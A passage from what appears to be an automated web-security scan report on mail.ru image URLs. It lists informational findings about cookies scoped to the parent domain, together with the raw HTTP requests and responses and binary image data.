User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/png
Content-Length: 1232
Connection: keep-alive
Set-Cookie: p=19oGAErbVQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

.PNG
.
...IHDR............e.t.....tEXtSoftware.Adobe ImageReadyq.e<...diTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

15.34. http://r2.mail.ru/b12526055.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526055.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=nt4GAFHdKwAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526055.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/gif
Content-Length: 122
Connection: keep-alive
Set-Cookie: p=nt4GAFHdKwAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a
.2.....F..........!.......,....
.2...K.....\.r.J...J.y.8...............49.............n..3V.>..i.Z....k...m..2...;

15.35. http://r2.mail.ru/b12526056.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526056.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=EuwGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526056.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/jpeg
Content-Length: 3722
Connection: keep-alive
Set-Cookie: p=EuwGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F.4..
...[SNIP]...

15.36. http://r2.mail.ru/b12526057.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526057.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=gNkGAEnndQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526057.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 2843
Connection: keep-alive
Set-Cookie: p=gNkGAEnndQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F.7..
...[SNIP]...

15.37. http://r2.mail.ru/b12526058.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526058.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=lfUGAE2r7QAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526058.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/jpeg
Content-Length: 3343
Connection: keep-alive
Set-Cookie: p=lfUGAE2r7QAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F.0..
...[SNIP]...

15.38. http://r2.mail.ru/b12526059.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526059.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=8uAGAEipQQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526059.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 2876
Connection: keep-alive
Set-Cookie: p=8uAGAEipQQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F....
...[SNIP]...

15.39. http://r2.mail.ru/b12526060.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526060.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=V+YGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526060.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 3123
Connection: keep-alive
Set-Cookie: p=V+YGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F.7..
...[SNIP]...

15.40. http://r2.mail.ru/b12526061.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526061.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=SPYGAEidmwAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526061.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 3005
Connection: keep-alive
Set-Cookie: p=SPYGAEidmwAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F.4..
...[SNIP]...

15.41. http://r2.mail.ru/b12526062.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526062.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=NOIGAEqT7AAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526062.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 3109
Connection: keep-alive
Set-Cookie: p=NOIGAEqT7AAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F.7..
...[SNIP]...

15.42. http://r2.mail.ru/b12526063.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526063.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=S+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526063.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 2846
Connection: keep-alive
Set-Cookie: p=S+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F.6..
...[SNIP]...

15.43. http://r2.mail.ru/b12526064.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526064.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=JRMHAEzBGQAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526064.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:22 GMT
Content-Type: image/jpeg
Content-Length: 2433
Connection: keep-alive
Set-Cookie: p=JRMHAEzBGQAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:22 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F.6..
...[SNIP]...

15.44. http://r2.mail.ru/b12526065.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526065.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=uuYGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526065.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:22 GMT
Content-Type: image/gif
Content-Length: 119
Connection: keep-alive
Set-Cookie: p=uuYGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:22 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a
.2.....F..........!.......,....
.2...H.....\.r.J...J.y.8.............-.....T...x..n..)kL.3..>;.P.t.Q..-f#.....;

15.45. http://r2.mail.ru/b12526191.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526191.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=rPYGAEqlaAAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526191.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:25 GMT
Content-Type: image/gif
Content-Length: 535
Connection: keep-alive
Set-Cookie: p=rPYGAEqlaAAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:25 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........f.=p.2h.......8nz..`~.b.....4[....2Z....Ce....Km..T.Il......e'R~Lm....c...Bt...$N{...... Ix..d......8_..*aLo....Hl..7m....5k........../fa.]|..3h=c....,U..1h.......Ar.........Qr.!L|.2iG
...[SNIP]...

15.46. http://r2.mail.ru/b12526192.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526192.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=vaYGAFbDNQAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526192.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:25 GMT
Content-Type: image/gif
Content-Length: 165
Connection: keep-alive
Set-Cookie: p=vaYGAFbDNQAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:25 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.......`t.@|.=|.Qx.E|.=.L|.9..D~.G.@.................................................................!..Created with GIMP.,........... .@.p...4....@C.5.C..;

15.47. http://r2.mail.ru/b12526193.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526193.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=lPQGAFSf2AAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526193.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/gif
Content-Length: 636
Connection: keep-alive
Set-Cookie: p=lPQGAFSf2AAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........(......]..':.7T.../................................................#H.#H...................e.....j........cv....0K.........................l...............:@..................Wc.[s.....
...[SNIP]...

15.48. http://r2.mail.ru/b12526194.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526194.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=kYsGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526194.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/gif
Content-Length: 93
Connection: keep-alive
Set-Cookie: p=kYsGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........Us.....*..!.......,................#..."...jJ......&....X
....+X..u....
.DC..;

15.49. http://r2.mail.ru/b12526208.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526208.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=cuMGAEjl4gAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526208.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 132
Connection: keep-alive
